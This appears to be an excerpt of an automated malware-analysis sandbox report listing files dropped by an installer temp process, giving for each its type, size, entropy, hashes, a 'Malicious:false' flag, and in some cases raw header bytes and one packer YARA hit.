SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):906766
Entropy (8bit):6.450201653594769
Encrypted:false
SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
MD5:AF785965AB0BF2474B3DD6E53DA2F368
SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):258560
Entropy (8bit):6.491223412910377
Encrypted:false
SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):36752
Entropy (8bit):7.780431937344781
Encrypted:false
SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:9FF783BB73F8868FA6599CDE65ED21D7
SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):127669
                                                                                          Entropy (8bit):7.952352167575405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                                          MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                                          SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                                          SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                                          SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp, Author: Joe Security
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):967168
                                                                                          Entropy (8bit):6.500850562754145
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                          MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                          SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                          SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                          SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                          Category:dropped
                                                                                          Size (bytes):506871
                                                                                          Entropy (8bit):7.998074018431883
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                          MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                          SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                          SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                          SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                          Malicious:false
                                                                                          Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                          Category:dropped
                                                                                          Size (bytes):506871
                                                                                          Entropy (8bit):7.998074018431883
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                          MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                          SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                          SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                          SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                          Malicious:false
                                                                                          Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):512014
                                                                                          Entropy (8bit):6.566561154468342
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                          MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                          SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                          SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                          SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):126478
                                                                                          Entropy (8bit):6.268811819718352
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                          MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                          SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                          SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                          SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):845312
                                                                                          Entropy (8bit):6.581151900686739
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                          MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                          SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                          SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                          SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):648384
                                                                                          Entropy (8bit):6.666474522542094
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                                          MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                                          SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                                          SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                                          SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):227328
                                                                                          Entropy (8bit):6.641153481093122
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                          MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                          SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                          SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                          SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):867854
                                                                                          Entropy (8bit):4.9264497464202694
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                          MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                          SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                          SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                          SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p................................*..........................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc...*.......,..................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):394752
                                                                                          Entropy (8bit):6.662070316214798
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                          MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                          SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                          SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                          SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):68042
                                                                                          Entropy (8bit):6.090396152400884
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                          MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                          SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                          SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                          SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):123406
                                                                                          Entropy (8bit):6.263889638223575
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                          MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                          SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                          SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                          SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):562190
                                                                                          Entropy (8bit):6.388293171196564
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                          MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                          SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                          SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                          SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):22542
                                                                                          Entropy (8bit):5.5875455203930615
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                          MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                          SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                          SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                          SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):25614
                                                                                          Entropy (8bit):6.0293046975090325
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                          MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                          SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                          SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                          SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):15374
                                                                                          Entropy (8bit):5.25938266470983
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                          MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                          SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                          SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                          SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):15374
                                                                                          Entropy (8bit):5.25938266470983
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                          MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                          SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                          SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                          SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):25614
                                                                                          Entropy (8bit):6.0293046975090325
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                          MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                          SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                          SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                          SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):43520
                                                                                          Entropy (8bit):6.232860260916194
